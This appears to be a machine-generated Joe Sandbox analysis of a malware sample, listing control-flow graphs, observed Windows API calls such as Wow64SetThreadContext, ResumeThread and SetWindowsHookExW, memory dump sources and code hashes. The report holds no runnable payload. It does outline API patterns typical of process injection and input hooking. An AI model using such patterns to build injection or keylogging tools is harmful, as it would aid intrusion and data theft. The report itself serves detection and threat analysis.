                                • Opcode ID: 271b77a8f0fbfd840bc23dfe584676ecd77b693684bd175fef4f6290b3b60d2b
                                • Instruction ID: e3355b53bccfaed06a1abe86be9b5f22747b8b9ea8fb7c828741ff103f2f16e1
                                • Opcode Fuzzy Hash: 271b77a8f0fbfd840bc23dfe584676ecd77b693684bd175fef4f6290b3b60d2b
                                • Instruction Fuzzy Hash: 9D31A8B5D012599FCB10CFAAD984ADEFBF1BB49314F24802AE418B7250D778AA45CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 228 2a91ec8-2a91f24 229 2a91f3b-2a91f82 Wow64SetThreadContext 228->229 230 2a91f26-2a91f38 228->230 231 2a91f8b-2a91fc3 229->231 232 2a91f84-2a91f8a 229->232 230->229 232->231
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02A91F72
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 0eff942833b320d00f557d4e0c879d1137192b91dfd73567bdd8fd308109df2d
                                • Instruction ID: ed46462d53b190d733aba19071112bef48ef565dde11cc7e25264495f379ac41
                                • Opcode Fuzzy Hash: 0eff942833b320d00f557d4e0c879d1137192b91dfd73567bdd8fd308109df2d
                                • Instruction Fuzzy Hash: 6931A7B4D012599FCF10CFAAD984ADEFBF1BB49314F24802AE418B7210D778AA45CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 235 2a92333-2a923be ResumeThread 237 2a923c0-2a923c6 235->237 238 2a923c7-2a923f5 235->238 237->238
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02A923AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 8ef8a06ea12ade99d3340e2015343134a1c440edd8b7f2db3adba03d96595ef4
                                • Instruction ID: 3af42b73e95511173610ec758c1e59ca542a0e39fe0c125f35e4c2e322c03b42
                                • Opcode Fuzzy Hash: 8ef8a06ea12ade99d3340e2015343134a1c440edd8b7f2db3adba03d96595ef4
                                • Instruction Fuzzy Hash: BB21AAB9D002099FCB10CFAAD884ADEFBF4AB49324F24905AE914B3310C775A945CFA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 241 2a92338-2a923be ResumeThread 242 2a923c0-2a923c6 241->242 243 2a923c7-2a923f5 241->243 242->243
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02A923AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 88796053e0acb9c39647ef8c9dcc768ba53fc68b9db546e22eec158125408200
                                • Instruction ID: c5ed1f05f07a0856d328d97c859dd1209be9dfbd023432ab456d4daafe23f7c8
                                • Opcode Fuzzy Hash: 88796053e0acb9c39647ef8c9dcc768ba53fc68b9db546e22eec158125408200
                                • Instruction Fuzzy Hash: FF2188B8D002199FCB10CFAAD584ADEFBF4AB49324F24905AE918B7310D775A945CFA4

                                Execution Graph

                                Execution Coverage:11.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:210
                                Total number of Limit Nodes:19
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8527f3ceac8b3806bbc81c25b9db1302f61b8c60053a9b908b0f1df71fcf4f6f
                                • Instruction ID: 9cca0e9f3908b630fb5481e86f26443ca03d052de368625cf2d3543e69bb4048
                                • Opcode Fuzzy Hash: 8527f3ceac8b3806bbc81c25b9db1302f61b8c60053a9b908b0f1df71fcf4f6f
                                • Instruction Fuzzy Hash: 7D81C0B4D00248DFDF58DFA5D884AEDBFB2BF89300F24812AE915AB264DB315852DF41
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f6ad97b1cf4be79dc8aa889c8262b8348cbe4fa25328a3eb8f0361e1e4fcdf2
                                • Instruction ID: e04d6253a6284e2a8847576df29e27dda4eb7e14c84205e9623f2d82c092ed7c
                                • Opcode Fuzzy Hash: 3f6ad97b1cf4be79dc8aa889c8262b8348cbe4fa25328a3eb8f0361e1e4fcdf2
                                • Instruction Fuzzy Hash: CE71C2B4E00228CFDBA8DF69D854B9DBBB2BF89300F1081AAD559A7351DB301E85CF51
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f0718651c117900f74ec25f5557ba13c994f5a67ad612cbc6139f89df5d4d9a
                                • Instruction ID: 1b0e82c472eb85b5486afa548b4fd28dfa32a8be4ac503fcf1ce5072f8151e14
                                • Opcode Fuzzy Hash: 7f0718651c117900f74ec25f5557ba13c994f5a67ad612cbc6139f89df5d4d9a
                                • Instruction Fuzzy Hash: CA51BAB4E01248DFCB58DFA9D4949DDBBB2FF89310F209129E805AB354DB34A982CF50

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 01238EEE
                                • GetCurrentThread.KERNEL32 ref: 01238F2B
                                • GetCurrentProcess.KERNEL32 ref: 01238F68
                                • GetCurrentThreadId.KERNEL32 ref: 01238FC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID: _? >
                                • API String ID: 2063062207-3388496716

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 01238EEE
                                • GetCurrentThread.KERNEL32 ref: 01238F2B
                                • GetCurrentProcess.KERNEL32 ref: 01238F68
                                • GetCurrentThreadId.KERNEL32 ref: 01238FC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID: _? >
                                • API String ID: 2063062207-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 47 5d8bcb8-5d8bd1c 50 5d8bfaa-5d8c076 47->50 51 5d8bd22-5d8bd3a 47->51 80 5d8c078-5d8c07e 50->80 81 5d8c07f-5d8c093 50->81 56 5d8bd3c-5d8bd42 51->56 57 5d8bd52-5d8bd54 51->57 58 5d8bd44 56->58 59 5d8bd46-5d8bd48 56->59 61 5d8bd64-5d8bd8f 57->61 62 5d8bd56-5d8bd5d 57->62 58->57 59->57 69 5d8bd97-5d8bdc5 GetCurrentThreadId 61->69 62->61 71 5d8bdce-5d8bdd7 69->71 72 5d8bdc7-5d8bdcd 69->72 73 5d8bde8-5d8bdee 71->73 74 5d8bdd9-5d8bddf 71->74 72->71 77 5d8bdf0-5d8bdf5 73->77 78 5d8bdf7-5d8be3d 73->78 74->73 76 5d8bde1 74->76 76->73 77->78 87 5d8be5d-5d8be78 78->87 88 5d8be3f-5d8be55 78->88 80->81 91 5d8be7a 87->91 92 5d8be82 87->92 88->87 91->92 92->50
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 05D8BDB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID: _? >$_? >
                                • API String ID: 2882836952-977242381

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 94 7a399b8-7a399d8 95 7a399da 94->95 96 7a399df-7a3abe2 call 7a3b650 * 2 94->96 95->96 323 7a3abec-7a3ac09 96->323
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2756353336.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7a30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: $!$"
                                • API String ID: 0-901016805

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 327 5d8bca1-5d8bd1c 331 5d8bfaa-5d8c076 327->331 332 5d8bd22-5d8bd3a 327->332 361 5d8c078-5d8c07e 331->361 362 5d8c07f-5d8c093 331->362 337 5d8bd3c-5d8bd42 332->337 338 5d8bd52-5d8bd54 332->338 339 5d8bd44 337->339 340 5d8bd46-5d8bd48 337->340 342 5d8bd64-5d8bd7f 338->342 343 5d8bd56-5d8bd5d 338->343 339->338 340->338 348 5d8bd87-5d8bd8f 342->348 343->342 350 5d8bd97-5d8bdc5 GetCurrentThreadId 348->350 352 5d8bdce-5d8bdd7 350->352 353 5d8bdc7-5d8bdcd 350->353 354 5d8bde8-5d8bdee 352->354 355 5d8bdd9-5d8bddf 352->355 353->352 358 5d8bdf0-5d8bdf5 354->358 359 5d8bdf7-5d8be3d 354->359 355->354 357 5d8bde1 355->357 357->354 358->359 368 5d8be5d-5d8be78 359->368 369 5d8be3f-5d8be55 359->369 361->362 372 5d8be7a 368->372 373 5d8be82 368->373 369->368 372->373 373->331
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 05D8BDB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID: _? >
                                • API String ID: 2882836952-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 375 6ca5f60-6ca5f6b 376 6ca5f6d-6ca5f94 call 6ca41e4 375->376 377 6ca5f95-6ca5fb4 call 6ca41f0 375->377 383 6ca5fba-6ca6019 377->383 384 6ca5fb6-6ca5fb9 377->384 390 6ca601b-6ca601e 383->390 391 6ca601f-6ca60ac GlobalMemoryStatusEx 383->391 394 6ca60ae-6ca60b4 391->394 395 6ca60b5-6ca60dd 391->395 394->395
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2753183487.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6ca0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 398 5d88c50-5d88c75 call 5d8781c 401 5d88c8a-5d88d1c CreateIconFromResourceEx 398->401 402 5d88c77-5d88c87 call 5d88710 398->402 407 5d88d1e-5d88d24 401->407 408 5d88d25-5d88d42 401->408 407->408
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CreateFromIconResource
                                • String ID: _? >
                                • API String ID: 3668623891-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 411 1238b54-123914c DuplicateHandle 413 1239155-1239172 411->413 414 123914e-1239154 411->414 414->413
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0123907E,?,?,?,?,?), ref: 0123913F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: _? >
                                • API String ID: 3793708945-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 417 12390b0-12390b3 418 12390b8-123914c DuplicateHandle 417->418 419 1239155-1239172 418->419 420 123914e-1239154 418->420 420->419
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0123907E,?,?,?,?,?), ref: 0123913F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: _? >
                                • API String ID: 3793708945-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 423 1233bf0-1233c42 425 1233c44 423->425 426 1233c4e-1233c80 SetWindowsHookExW 423->426 429 1233c4c 425->429 427 1233c82-1233c88 426->427 428 1233c89-1233cae 426->428 427->428 429->426
                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01233C73
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID: _? >
                                • API String ID: 2559412058-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 433 1233bf8-1233c42 435 1233c44 433->435 436 1233c4e-1233c80 SetWindowsHookExW 433->436 439 1233c4c 435->439 437 1233c82-1233c88 436->437 438 1233c89-1233cae 436->438 437->438 439->436
                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01233C73
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID: _? >
                                • API String ID: 2559412058-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 443 5d8781c-5d88d1c CreateIconFromResourceEx 445 5d88d1e-5d88d24 443->445 446 5d88d25-5d88d42 443->446 445->446
                                APIs
                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05D88C6A,?,?,?,?,?), ref: 05D88D0F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CreateFromIconResource
                                • String ID: _? >
                                • API String ID: 3668623891-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 449 6ca41f0-6ca60ac GlobalMemoryStatusEx 452 6ca60ae-6ca60b4 449->452 453 6ca60b5-6ca60dd 449->453 452->453
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06CA5FB2), ref: 06CA609F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2753183487.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6ca0000_GeUT.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: _? >
                                • API String ID: 1890195054-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 456 5d8c608-5d8c67a PostMessageW 458 5d8c67c-5d8c682 456->458 459 5d8c683-5d8c6a4 456->459 458->459
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 05D8C66D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: _? >
                                • API String ID: 410705778-3388496716

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 461 5d8c610-5d8c67a PostMessageW 462 5d8c67c-5d8c682 461->462 463 5d8c683-5d8c6a4 461->463 462->463
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 05D8C66D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID: _? >
                                • API String ID: 410705778-3388496716
                                APIs
                                • SendMessageW.USER32(?,?,?,?), ref: 05D8906D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: _? >
                                • API String ID: 3850602802-3388496716
                                APIs
                                • SendMessageW.USER32(?,?,?,?), ref: 05D8906D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: _? >
                                • API String ID: 3850602802-3388496716
                                • Opcode Fuzzy Hash: f84aac9300c7c95f696b75af2f2fbecf52da13224c0f046c81ef029a5adb7c03
                                • Instruction Fuzzy Hash: 3542F3B0901245CFE724DF98D688B8EBBF1FF1431AF19C098E048AB262C775D94ACB55
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-980617297
                                • Opcode ID: 95c9855448bc4db147b392d39868e396e768c6ef4f8c42dda135839b34d25d25
                                • Instruction ID: 648c52785d18d75f6c218e85ada204ced1062c709fbbb2a0fbaf686b1b2f9bc0
                                • Opcode Fuzzy Hash: 95c9855448bc4db147b392d39868e396e768c6ef4f8c42dda135839b34d25d25
                                • Instruction Fuzzy Hash: 0832D3B0901245DFE720DF98D688B8EBBF6FF1431AF1AC058E048AB262C775D949CB55
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: L<5t
                                • API String ID: 0-682513406
                                • Opcode ID: c340247e37a4f684ad643f766bd7b6af25db0bb8a5fe8052e9a9ba097dcbbb8c
                                • Instruction ID: 3c5489d68b2cd6f29154b5f145b938abc720b0b75a6f8c0e54dc70bb321d0ef1
                                • Opcode Fuzzy Hash: c340247e37a4f684ad643f766bd7b6af25db0bb8a5fe8052e9a9ba097dcbbb8c
                                • Instruction Fuzzy Hash: B8B1E3B4E01219CFCB68DFA4D884A9DBBB2BF89300F208169D419AB355DB315E85CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: (
                                • API String ID: 0-3887548279
                                • Opcode ID: ed2e7bbc7a4bf01decdb6f8366e1fcb2854a929b8ab1d97aae6516a023cf64df
                                • Instruction ID: f87c5573f8b40c03eba54e846aa753d049f1309e03a493b0b2eab110233b49c3
                                • Opcode Fuzzy Hash: ed2e7bbc7a4bf01decdb6f8366e1fcb2854a929b8ab1d97aae6516a023cf64df
                                • Instruction Fuzzy Hash: 58814AB5A0021ADFCB04DFA8D4849AEFBB1FF89311F148169E915AB351D735AC52CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 883394b71fcc1f5090fce4708adb471ccbaa58b6c21302ca89e97886288048a9
                                • Instruction ID: 1cf97bcd87e0a6f31bab3fcab1deeb92df94f8aecea64e496533492997f28342
                                • Opcode Fuzzy Hash: 883394b71fcc1f5090fce4708adb471ccbaa58b6c21302ca89e97886288048a9
                                • Instruction Fuzzy Hash: E56104B1D0021DDFDB24DFA9C984ADEBBB5BF48304F20816AE805BB251DB75A945CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: ae16464b536b5ce6915000c2230fec04a5992d2d60a5d178954d15919bc5ab41
                                • Instruction ID: 407b847b2cf36f903a5f311f54ca6a56374a0aec1215d20181a4b628ba3fd5aa
                                • Opcode Fuzzy Hash: ae16464b536b5ce6915000c2230fec04a5992d2d60a5d178954d15919bc5ab41
                                • Instruction Fuzzy Hash: B151F4B1D0021DCFDB24DFA9C884ADEBBB5BF48304F20816AE805BB255DB75A945CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: ec83774e678c000bf9a6d9783929e3356bc927bf0cfb6d2d3b2b308fd5b8df02
                                • Instruction ID: 40e6287adb2d747714a52bff6d53b1c873e9955ad6a5527e0e25c0a8097209b4
                                • Opcode Fuzzy Hash: ec83774e678c000bf9a6d9783929e3356bc927bf0cfb6d2d3b2b308fd5b8df02
                                • Instruction Fuzzy Hash: 9E21F3B5D012199FCB20DF9AD484BDEFBF4EF48720F14806AE818AB241D7749A44CFA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 1aabf8d23150f7d2d4c654ebfe65697a0529eb7466aa70b15a0cc6fd111ea2b3
                                • Instruction ID: b965f137992c2a141c5a3df00042b2477be40456444023c5a2a40f6c48720ed5
                                • Opcode Fuzzy Hash: 1aabf8d23150f7d2d4c654ebfe65697a0529eb7466aa70b15a0cc6fd111ea2b3
                                • Instruction Fuzzy Hash: 7621D4B5E002198FCB45CFA9D880AEEBBB1FB88210F10856AD514B7354D7745A45CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 893141e829d54ff37e2a983195d21d7bc8731a71d89c997d91e73451224e4334
                                • Instruction ID: 0d7f4be3509999f6765794e4f1936d0e92be1f65d0d10ae95de8c468220cae68
                                • Opcode Fuzzy Hash: 893141e829d54ff37e2a983195d21d7bc8731a71d89c997d91e73451224e4334
                                • Instruction Fuzzy Hash: 4921F5B1D012199FCB20DF9AD484BDEFBF4EF48710F14806AE818AB245D7749A44CFA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 4f3b48b18720897c55396ce2025ba051c6825432d248b7b79e8ba47c1b82d433
                                • Instruction ID: 88da733e82c6edfa70917db005ec1a0a4893f57ab50a43ba4ff86db9fcaa4b16
                                • Opcode Fuzzy Hash: 4f3b48b18720897c55396ce2025ba051c6825432d248b7b79e8ba47c1b82d433
                                • Instruction Fuzzy Hash: F521C5B5E002199FCF44DFA9D880AEEBBF5FB88210F10816AD514B7354D774AA41CFA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: d0b0f1ddf0c4225e239aa14a3557717b5220ccf5aa6b9eb1ec2ca33da5d1452d
                                • Instruction ID: 1f28617e4b8e8be1faad05009bf5713cf26a1c0ec666bb8cc8850c6015ba479e
                                • Opcode Fuzzy Hash: d0b0f1ddf0c4225e239aa14a3557717b5220ccf5aa6b9eb1ec2ca33da5d1452d
                                • Instruction Fuzzy Hash: FC21C2B1D01219AFDB10DF9AD884ADEFBF4FB48714F10812AE918A7240C3746954CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 0cdb83d390f151eb20f428a7b433ee9899febdf46a183a86c61fbde4576a15bd
                                • Instruction ID: ba0c6e34b375421b45048eea537a84ded9e5a4fc231b708e045db5ea82296f62
                                • Opcode Fuzzy Hash: 0cdb83d390f151eb20f428a7b433ee9899febdf46a183a86c61fbde4576a15bd
                                • Instruction Fuzzy Hash: A821C2B1D01219AFDB10DFAAD884ADEFBF4FB48310F10852AE918A7240C374A954CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: 89098fac15996db15187cf40de239c69d5b5bc1f4b2318c8dff086fbca00a496
                                • Instruction ID: 05e7a599302aa02dd437e107adea4865e14c28f6668c1df367ada6897be4ad5c
                                • Opcode Fuzzy Hash: 89098fac15996db15187cf40de239c69d5b5bc1f4b2318c8dff086fbca00a496
                                • Instruction Fuzzy Hash: 141100B580074A8FDB20DF9AD884BDEFBF4AB48320F208459D519A3691C379A944CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757880139.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7d10000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: _? >
                                • API String ID: 0-3388496716
                                • Opcode ID: dc41a284992bc3f552cdc599c20fad9d0581ac8e34d90dca053e1fd103c84c02
